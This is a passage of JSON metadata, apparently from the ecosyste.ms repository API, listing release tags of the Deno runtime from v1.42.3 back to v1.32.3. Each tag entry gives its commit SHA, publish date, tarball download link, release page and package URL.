2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/host